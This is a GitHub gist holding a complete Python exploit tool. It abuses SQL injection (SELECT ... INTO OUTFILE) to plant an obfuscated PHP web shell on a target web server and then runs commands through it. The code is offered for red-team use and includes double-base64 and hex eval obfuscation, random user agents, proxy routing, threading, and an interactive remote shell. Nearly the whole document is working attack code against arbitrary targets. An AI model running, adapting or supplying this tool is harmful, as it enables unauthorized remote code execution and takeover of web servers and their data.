Skip to content

Instantly share code, notes, and snippets.

@0xHossam
Created December 7, 2024 14:03
Show Gist options
  • Save 0xHossam/6205d933db6ec8923cd5dbccc88a16e0 to your computer and use it in GitHub Desktop.
Save 0xHossam/6205d933db6ec8923cd5dbccc88a16e0 to your computer and use it in GitHub Desktop.
A Python utility that leverages SQL injection to achieve remote code execution (RCE) by deploying obfuscated web shells, featuring proxy support and multi-threading for effective red team operations.
import argparse
import requests
import urllib.parse
import sys
import base64
import logging
import random
import time
import threading
from typing import Optional
logging.basicConfig(
level=logging.INFO,
format='[%(asctime)s] %(levelname)s: %(message)s',
handlers=[
logging.FileHandler("MYSQLtoRCE.log"),
logging.StreamHandler(sys.stdout)
]
)
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36",
]
class Exploiter:
def __init__(self, target: str, port: int = 80, url_path: str = "/vulnerable.php",
shell_path: str = "/shell.php", use_https: bool = False,
timeout: int = 10, max_retries: int = 3, proxy: Optional[str] = None,
additional_headers: Optional[dict] = None, encrypt_payload: bool = False):
self.scheme = 'https' if use_https else 'http'
self.target = target
self.port = port
self.url_path = url_path
self.shell_url = f"{ self.scheme }://{ self.target }:{ self.port }{ shell_path }"
self.timeout = timeout
self.max_retries = max_retries
self.proxy = proxy
self.encrypt_payload = encrypt_payload
self.headers = {
'User-Agent': random.choice(USER_AGENTS)
}
if additional_headers:
self.headers.update(additional_headers)
self.session = requests.Session()
if self.proxy:
self.session.proxies = {
'http': self.proxy,
'https': self.proxy
}
logging.info(f"initialized exploiter with target {self.shell_url}")
def obfuscate_payload( self , encoding: str = "base64" ) -> str:
php_shell = "<?php $result=exec($_GET['action']);echo '<pre>'.$result.'</pre>'; ?>"
logging.debug( f"original php shell: { php_shell }" )
if self.encrypt_payload:
# simple encryption (for demonstration; use stronger methods in real scenarios)
php_shell = base64.b64encode(php_shell.encode()).decode()
logging.debug( f"encrypted php shell: { php_shell }" )
if encoding == "base64":
# base64 encode the payload
encoded_payload = base64.b64encode(php_shell.encode()).decode()
logging.debug( f"base64 encoded payload: { encoded_payload }" )
# split the encoded payload
split_index = len( encoded_payload ) // 2
part1 = encoded_payload[:split_index]
part2 = encoded_payload[split_index:]
logging.debug( f"split payload part1: { part1 }" )
logging.debug( f"split payload part2: { part2 }" )
# further encode each part
part1_encoded = base64.b64encode( part1.encode() ).decode()
part2_encoded = base64.b64encode( part2.encode() ).decode()
logging.debug(f"double base64 encoded part1: { part1_encoded }")
logging.debug(f"double base64 encoded part2: { part2_encoded }")
# create an obfuscated version that decodes and executes the payload in parts
obfuscated = (
f"<?php eval(base64_decode(base64_decode('{part1_encoded}')) . "
f"base64_decode(base64_decode('{part2_encoded}'))); ?>"
)
logging.debug(f"obfuscated payload: {obfuscated}")
return obfuscated
elif encoding == "hex":
# hex encode the payload
encoded_payload = php_shell.encode().hex()
logging.debug(f"hex encoded payload: {encoded_payload}")
obfuscated = f"<?php eval(hex2bin('{encoded_payload}')); ?>"
logging.debug(f"obfuscated payload: {obfuscated}")
return obfuscated
else:
logging.warning(f"unsupported encoding type: {encoding}. using plain payload.")
return php_shell
def construct_sql_injection( self, obf_payload: str ) -> str:
# escape single quotes in the payload
escaped_payload = obf_payload.replace("'", "''")
sql_payload = (
f"SELECT '{escaped_payload}' INTO OUTFILE '/var/www/html/shell.php' FROM mysql.user LIMIT 1;"
)
logging.debug(f"constructed sql injection payload: {sql_payload}")
return sql_payload
def send_payload(self, target_url: str, sql_payload: str) -> bool:
encoded_payload = urllib.parse.quote(sql_payload)
injection_url = f"{target_url}?id={encoded_payload}"
logging.info(f"sending payload to {injection_url}")
for attempt in range(1, self.max_retries + 1):
try:
response = self.session.get(injection_url, headers=self.headers, timeout=self.timeout, verify=False)
if response.status_code == 200:
logging.info("payload sent successfully.")
return True
else:
logging.warning(f"attempt {attempt} : failed to send payload. status code: {response.status_code}")
except requests.RequestException as e:
logging.error(f"attempt {attempt} : error sending payload: {e}")
# exponential backoff
sleep_time = 2 ** attempt
logging.debug(f"sleeping for {sleep_time} seconds before retrying...")
time.sleep(sleep_time)
return False
def verify_payload(self) -> bool:
logging.info(f"verifying payload at {self.shell_url}")
try:
response = self.session.get(self.shell_url, headers=self.headers, timeout=self.timeout, verify=False)
if response.status_code == 200 and ("<?php" in response.text or "exec" in response.text):
logging.info("payload verification succeeded.")
return True
else:
logging.warning("payload verification failed.")
return False
except requests.RequestException as e:
logging.error(f"error verifying payload: {e}")
return False
def execute_command(self, command: str) -> Optional[str]:
encoded_command = urllib.parse.quote(command)
cmd_url = f"{self.shell_url}?action={encoded_command}"
logging.info(f"executing command: {command}")
for attempt in range(1, self.max_retries + 1):
try:
response = self.session.get(cmd_url, headers=self.headers, timeout=self.timeout, verify=False)
if response.status_code == 200:
logging.info("command executed successfully.")
return response.text
else:
logging.warning(f"attempt {attempt} : failed to execute command. status code: {response.status_code}")
except requests.RequestException as e:
logging.error(f"attempt {attempt} : error executing command: {e}")
# exponential backoff
sleep_time = 2 ** attempt
logging.debug(f"sleeping for {sleep_time} seconds before retrying...")
time.sleep(sleep_time)
return None
def interactive_shell(self):
logging.info("starting interactive shell. type 'exit' or 'quit' to terminate.")
while True:
try:
command = input("shell> ")
if command.lower() in ['exit', 'quit']:
logging.info("exiting interactive shell.")
break
elif command.strip() == '':
continue # ignore empty commands
output = self.execute_command(command)
if output:
print(output)
else:
print("[-] no output or failed to execute command.")
except KeyboardInterrupt:
logging.warning("keyboard interrupt received. exiting interactive shell.")
break
except Exception as e:
logging.error(f"unexpected error: {e}")
break
def send_payload_thread(exploiter, target_url, sql_payload):
if exploiter.send_payload(target_url, sql_payload):
logging.info("payload sent in thread successfully.")
else:
logging.warning("payload failed to send in thread.")
def main():
parser = argparse.ArgumentParser(
description="advanced sql injection exploit with enhanced obfuscation for red team engagements"
)
parser.add_argument("-t", "--target", required=True, help="target server ip or domain")
parser.add_argument("-p", "--port", type=int, default=80, help="target server port (default : 80)")
parser.add_argument("-u", "--url-path", default="/vulnerable.php", help="url path to the vulnerable script")
parser.add_argument("-s", "--shell-path", default="/shell.php", help="url path where the shell will be uploaded")
parser.add_argument("-c", "--command", help="command to execute after uploading the shell")
parser.add_argument("--https", action='store_true', help="use https for the target url")
parser.add_argument("--verify", action='store_true', help="verify payload upload after sending")
parser.add_argument("--interactive", action='store_true', help="open an interactive shell after uploading")
parser.add_argument("--encoding", choices=['base64', 'hex'], default='base64',
help="encoding method for payload obfuscation (default : base64)")
parser.add_argument("--verbosity", choices=['INFO', 'DEBUG'], default='INFO',
help="set logging verbosity level (default : INFO)")
parser.add_argument("--proxy", help="proxy server to route requests through (e.g., http://127.0.0.1:8080)")
parser.add_argument("--header", action='append', help="additional headers in the format Key:Value")
parser.add_argument("--encrypt-payload", action='store_true', help="encrypt payload for added stealth")
parser.add_argument("--threads", type=int, default=1, help="number of threads to send payloads concurrently")
args = parser.parse_args()
# adjust logging level based on verbosity argument
if args.verbosity == 'DEBUG':
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
additional_headers = {}
if args.header:
for header in args.header:
try:
key, value = header.split(":", 1)
additional_headers[key.strip()] = value.strip()
except ValueError:
logging.warning(f"invalid header format: {header}. expected Key:Value")
exploiter = Exploiter(
target=args.target,
port=args.port,
url_path=args.url_path,
shell_path=args.shell_path,
use_https=args.https,
proxy=args.proxy,
additional_headers=additional_headers,
encrypt_payload=args.encrypt_payload
)
logging.info("generating obfuscated payload...")
obf_payload = exploiter.obfuscate_payload(encoding=args.encoding)
logging.info("constructing sql injection payload...")
sql_payload = exploiter.construct_sql_injection(obf_payload)
logging.info("sending payload...")
target_url = f"{exploiter.scheme}://{exploiter.target}:{exploiter.port}{exploiter.url_path}"
if args.threads > 1:
threads = []
for i in range(args.threads):
thread = threading.Thread(target=send_payload_thread, args=(exploiter, target_url, sql_payload))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
else:
if not exploiter.send_payload(target_url, sql_payload):
logging.error("failed to send payload. exiting.")
sys.exit(1)
# optionally verify payload upload
if args.verify:
if not exploiter.verify_payload():
logging.error("payload verification failed. exiting.")
sys.exit(1)
# execute a single command if provided
if args.command:
output = exploiter.execute_command(args.command)
if output:
print("[+] command output:")
print(output)
else:
logging.warning("no output received from command execution.")
# open interactive shell if requested
if args.interactive:
if exploiter.verify_payload():
exploiter.interactive_shell()
else:
logging.error("cannot open interactive shell without successful payload upload.")
if not args.command and not args.interactive:
logging.info("payload uploaded. you can now execute commands using the shell.php.")
print(f"[*] access the shell at {exploiter.shell_url}?action=<your_command>")
if __name__ == "__main__":
# suppress insecure request warnings
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment